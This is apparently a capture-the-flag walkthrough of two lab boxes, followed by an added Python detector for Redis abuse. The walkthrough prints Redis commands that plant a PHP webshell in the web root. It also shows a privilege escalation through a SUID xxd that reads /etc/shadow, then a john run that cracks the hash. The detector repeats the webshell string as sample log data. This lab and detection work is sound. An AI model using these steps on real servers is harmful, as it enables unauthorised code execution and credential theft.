I did Watcher; it was okay, but nothing to write about. We had LFI to get FTP creds, upload a PHP reverse shell using the FTP account, then include it for RCE, then a few different things to move between users, but nothing exciting.


Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!

This was a Redis box, pretty simple. I mostly want to record the RCE step, which wasn’t guided. I followed this like so, with telnet:

└─# telnet 6379
Connected to
Escape character is '^]'.
# Server
# etc
config set dir /var/www/html 
config set dbfilename cmd.php
set test "<?php system($_GET['cmd']);?>"


Using the Python reverse shell. Privesc was via the SUID bit on xxd to read /etc/shadow and break a password for our user from the sudoers group:

www-data@ubuntu:/dev/shm$ LFILE=/etc/shadow 
www-data@ubuntu:/dev/shm$ xxd "$LFILE" | xxd -r
xxd "$LFILE" | xxd -r

Which then was:

└─# john hash -w=/usr/share/wordlists/rockyou.txt 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beautiful1       (?)
1g 0:00:00:00 DONE (2021-02-19 03:58) 1.754g/s 2245p/s 2245c/s 2245C/s kucing..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Anyway, the Redis part was relevant.
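
From the defender's side, the Redis step above leaves a recognisable trail in the server's command stream. This is an added example, not part of the original write-up: a small detector over `MONITOR`-style output that flags `CONFIG SET` changes to `dir`/`dbfilename` and script tags written while they are off baseline. The baseline values, the sample log lines and the names `detect`, `BASELINE` and `SAMPLE` are assumptions made for the example.

```python
import re
import shlex

# Assumed baseline for this host; adjust to the values in your redis.conf.
BASELINE = {"dir": "/var/lib/redis", "dbfilename": "dump.rdb"}
LINE = re.compile(r"^(\d+\.\d+) \[(\d+) (\S+)\] (.+)$")   # MONITOR line layout
SCRIPT_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
WRITE_CMDS = {"set", "setex", "setnx", "append", "hset", "lpush", "rpush"}

# Constructed sample of MONITOR output; addresses and timestamps are made up.
SAMPLE = r'''
1613706000.100000 [0 10.0.0.5:51234] "info"
1613706001.200000 [0 10.0.0.5:51234] "config" "set" "dir" "/var/www/html"
1613706002.300000 [0 10.0.0.5:51234] "config" "set" "dbfilename" "cmd.php"
1613706003.400000 [0 10.0.0.5:51234] "set" "test" "<?php system($_GET['cmd']);?>"
1613706004.500000 [0 10.0.0.9:40000] "config" "set" "maxmemory" "100mb"
1613706005.600000 [0 10.0.0.9:40000] "set" "session:1" "alice"
'''

def detect(monitor_text, baseline=BASELINE):
    """Return (timestamp, client, rule, detail) tuples for suspicious commands."""
    moved = {}    # persistence options currently off baseline (server-wide state)
    alerts = []
    for raw in monitor_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts, _db, client, rest = m.groups()
        try:
            argv = shlex.split(rest)          # handles MONITOR's quoted arguments
        except ValueError:
            continue                          # unparseable line: skip, don't crash
        if not argv:
            continue
        head = [a.lower() for a in argv[:2]]
        if head == ["config", "set"]:
            for name, value in zip(argv[2::2], argv[3::2]):  # Redis 7+ allows several pairs
                name = name.lower()
                if name not in baseline:
                    continue
                if value == baseline[name]:
                    moved.pop(name, None)     # restored to the expected value
                else:
                    moved[name] = value
                    alerts.append((ts, client, "persistence-redirect", f"{name}={value}"))
        elif head[0] in WRITE_CMDS and any(SCRIPT_TAG.search(a) for a in argv[1:]):
            rule = "script-write-after-redirect" if len(moved) == len(baseline) else "script-in-value"
            alerts.append((ts, client, rule, argv[1]))
    return alerts
```

State is tracked server-wide rather than per client because `dir` and `dbfilename` are global settings, so the redirect and the write may arrive on different connections.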